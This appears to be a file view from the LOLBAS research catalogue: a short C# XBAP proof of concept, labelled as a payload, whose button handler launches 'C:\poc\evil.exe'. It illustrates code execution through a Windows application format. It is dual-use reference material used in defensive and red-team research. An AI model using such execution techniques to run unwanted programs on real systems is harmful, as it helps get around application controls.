LOLBAS/Archive-Old-Version/OSBinaries/Payload/Evil.xbap

9 lines
175 B
Plaintext
Raw Normal View History

2018-06-09 00:15:06 +02:00
private void Button_click(object sender, RoutedEventArgs e)
{
if (RadioButton1.IsChecked == true)
{
Process.Start("C:\\poc\\evil.exe");
MessageBox.Show("BHello.");
}
}